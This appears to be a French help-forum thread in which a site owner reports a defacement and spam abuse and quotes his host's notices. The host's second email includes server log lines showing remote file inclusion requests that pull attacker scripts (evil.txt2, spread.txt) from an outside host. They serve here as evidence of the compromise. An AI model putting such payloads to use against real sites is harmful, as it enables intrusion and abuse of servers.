Piratage de mon site
Samuel
-
Samuel -
Samuel -
Bonjour,
J'ai été victime du piratage de mon site, ce matin, il affichait une page internet, comme quoi il a été hacké par la "Turk Attack team". J'ai donc remplacé cette page index, par l'ancienne. Le site a pu repartir.
Ensuite, j'ai cherché sur internet comment sécurisé mon site, j'ai trouvé quelques trucs, (notamment au niveau du .htaccess), que j'ai appliqué.
Ce soir, mon site n'est plus accessible, car mon hébergeur vient de bloquer tout accès, une page 403 est donc visible lorsque je me rends sur mon site.
Mon hébergeur (1and1) me demande de remédier aux problèmes dans mes scripts, mais je n'ai plus accès en FTP à mon site ...
Bref, ils m'ont envoyé un mail m'indiquant :
----
Depuis notre dernier courrier, nous avons reçu de nouvelles plaintes concernant
l'envoi de spam à partir de votre espace web 1&1.
L'envoi de spam représentant un danger imminent pour notre infrastructure, votre
espace web sera bloqué suite à ce message.
Pour le débloquer, veuillez nous faire part des délais dans lesquels vous saurez
vous adresser au problème. Pour ce faire, merci de répondre à cet email en
laissant notre référence REF dans votre message.
Dans le cas où l'envoi de spam a été extrêmement massif, ce message peu avoir
été envoyé très peu de temps après notre première notification. Dans ce cas,
nous regrettons que vous n'auriez pas eu le temps de trouver solution au
problème et éviter le blocage. Toutefois, le blocage est indispensable pour la
protection de notre infrastructure.
----
Puis un autre :
----
Mes collègues de notre division " Administration Serveurs " nous
informent qu'un script non sécurisé fût détecté sur votre compte client
***.
root@infong11:/kunden/homepages/1/d145180228/htdocs# chmod -v 000
license.php perl.pl errors.php
mode of `license.php' changed to 0000 (---------)
mode of `perl.pl' changed to 0000 (---------)
mode of `errors.php' changed to 0000 (---------)
root@infong11:/kunden/homepages/1/d145180228/htdocs# ln -sv
/usr/lib/php.ini-nourl php.ini
create symbolic link `php.ini' to `/usr/lib/php.ini-nourl'
151.66.131.59 - - [27/Jan/2009:11:20:28 +0100] "GET
//?page=http://ks27457.myhostlife.org/evil.txt2?? HTTP/1.1" 200 3309
www.magietopia.fr "-" "Mozilla/3.0 (compatible; Indy Library)" "-"
151.66.131.59 - - [27/Jan/2009:11:22:34 +0100] "GET
//?page=http://ks27457.myhostlife.org/spread.txt?? HTTP/1.1" 200 3329
www.magietopia.fr "-" "Mozilla/3.0 (compatible; Indy Library)" "-"
Vous êtes invité à sécuriser le plus rapidement possible ce script, il
est déjà possible que ce dernier soit suspendu suivant le risque que ce
dernier représenterait.
Nous vous remercions pour votre compréhension et votre collaboration au
traitement de cette alerte.
----
Le problème c'est que je n'y comprends pas grand chose dans ces lignes. Je sais simplement qu'un script a du envoyé massivement du spam, mais pour le second mail, je ne sais pas quoi faire.
Quelqu'un pourrait m'aider s'il vous plait ?
J'ai été victime du piratage de mon site, ce matin, il affichait une page internet, comme quoi il a été hacké par la "Turk Attack team". J'ai donc remplacé cette page index, par l'ancienne. Le site a pu repartir.
Ensuite, j'ai cherché sur internet comment sécurisé mon site, j'ai trouvé quelques trucs, (notamment au niveau du .htaccess), que j'ai appliqué.
Ce soir, mon site n'est plus accessible, car mon hébergeur vient de bloquer tout accès, une page 403 est donc visible lorsque je me rends sur mon site.
Mon hébergeur (1and1) me demande de remédier aux problèmes dans mes scripts, mais je n'ai plus accès en FTP à mon site ...
Bref, ils m'ont envoyé un mail m'indiquant :
----
Depuis notre dernier courrier, nous avons reçu de nouvelles plaintes concernant
l'envoi de spam à partir de votre espace web 1&1.
L'envoi de spam représentant un danger imminent pour notre infrastructure, votre
espace web sera bloqué suite à ce message.
Pour le débloquer, veuillez nous faire part des délais dans lesquels vous saurez
vous adresser au problème. Pour ce faire, merci de répondre à cet email en
laissant notre référence REF dans votre message.
Dans le cas où l'envoi de spam a été extrêmement massif, ce message peu avoir
été envoyé très peu de temps après notre première notification. Dans ce cas,
nous regrettons que vous n'auriez pas eu le temps de trouver solution au
problème et éviter le blocage. Toutefois, le blocage est indispensable pour la
protection de notre infrastructure.
----
Puis un autre :
----
Mes collègues de notre division " Administration Serveurs " nous
informent qu'un script non sécurisé fût détecté sur votre compte client
***.
root@infong11:/kunden/homepages/1/d145180228/htdocs# chmod -v 000
license.php perl.pl errors.php
mode of `license.php' changed to 0000 (---------)
mode of `perl.pl' changed to 0000 (---------)
mode of `errors.php' changed to 0000 (---------)
root@infong11:/kunden/homepages/1/d145180228/htdocs# ln -sv
/usr/lib/php.ini-nourl php.ini
create symbolic link `php.ini' to `/usr/lib/php.ini-nourl'
151.66.131.59 - - [27/Jan/2009:11:20:28 +0100] "GET
//?page=http://ks27457.myhostlife.org/evil.txt2?? HTTP/1.1" 200 3309
www.magietopia.fr "-" "Mozilla/3.0 (compatible; Indy Library)" "-"
151.66.131.59 - - [27/Jan/2009:11:22:34 +0100] "GET
//?page=http://ks27457.myhostlife.org/spread.txt?? HTTP/1.1" 200 3329
www.magietopia.fr "-" "Mozilla/3.0 (compatible; Indy Library)" "-"
Vous êtes invité à sécuriser le plus rapidement possible ce script, il
est déjà possible que ce dernier soit suspendu suivant le risque que ce
dernier représenterait.
Nous vous remercions pour votre compréhension et votre collaboration au
traitement de cette alerte.
----
Le problème c'est que je n'y comprends pas grand chose dans ces lignes. Je sais simplement qu'un script a du envoyé massivement du spam, mais pour le second mail, je ne sais pas quoi faire.
Quelqu'un pourrait m'aider s'il vous plait ?
A voir également:
- Piratage de mon site
- Site de telechargement - Accueil - Outils
- Site x - Guide
- Site de partage de photos - Guide
- Quel site remplace coco - Accueil - Réseaux sociaux
- Meilleur site de vente entre particulier - Guide
6 réponses
salut Samuel,
j'espère que tu as trouvé des solutions sinon certaines sont très certainement sur ce site:
https://openclassrooms.com/fr/courses/918836-concevez-votre-site-web-avec-php-et-mysql/914663-tp-un-minichat#ss_part_1
pour les questions de "sécurité de base" la page que je viens de te donner sera certainement très intéressante pour toi ou les autres dans ton cas et vous ne risquez pas de perdre votre temps à la lire.
voilà le Sam !
ps: si tu as trouvé une solution merci de l'indiquer pour les autres qui serait dans ton cas ;)
j'espère que tu as trouvé des solutions sinon certaines sont très certainement sur ce site:
https://openclassrooms.com/fr/courses/918836-concevez-votre-site-web-avec-php-et-mysql/914663-tp-un-minichat#ss_part_1
pour les questions de "sécurité de base" la page que je viens de te donner sera certainement très intéressante pour toi ou les autres dans ton cas et vous ne risquez pas de perdre votre temps à la lire.
voilà le Sam !
ps: si tu as trouvé une solution merci de l'indiquer pour les autres qui serait dans ton cas ;)
J'ai trouvé des solutions pas mal sur ce site :
https://forum.ovh.com/showthread.php/19263
Mais je n'ai toujours pas accès à mon FTP et je pense que je vais devoir attendre Lundi, puisqu'ils ne doivent pas travailler le WE !
Merci beaucou pour vos réponses !
https://forum.ovh.com/showthread.php/19263
Mais je n'ai toujours pas accès à mon FTP et je pense que je vais devoir attendre Lundi, puisqu'ils ne doivent pas travailler le WE !
Merci beaucou pour vos réponses !
Oui effectivement, il faut que tuai accès au moins au FTP, quel type de script utilise tu, fait maison ou autre
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
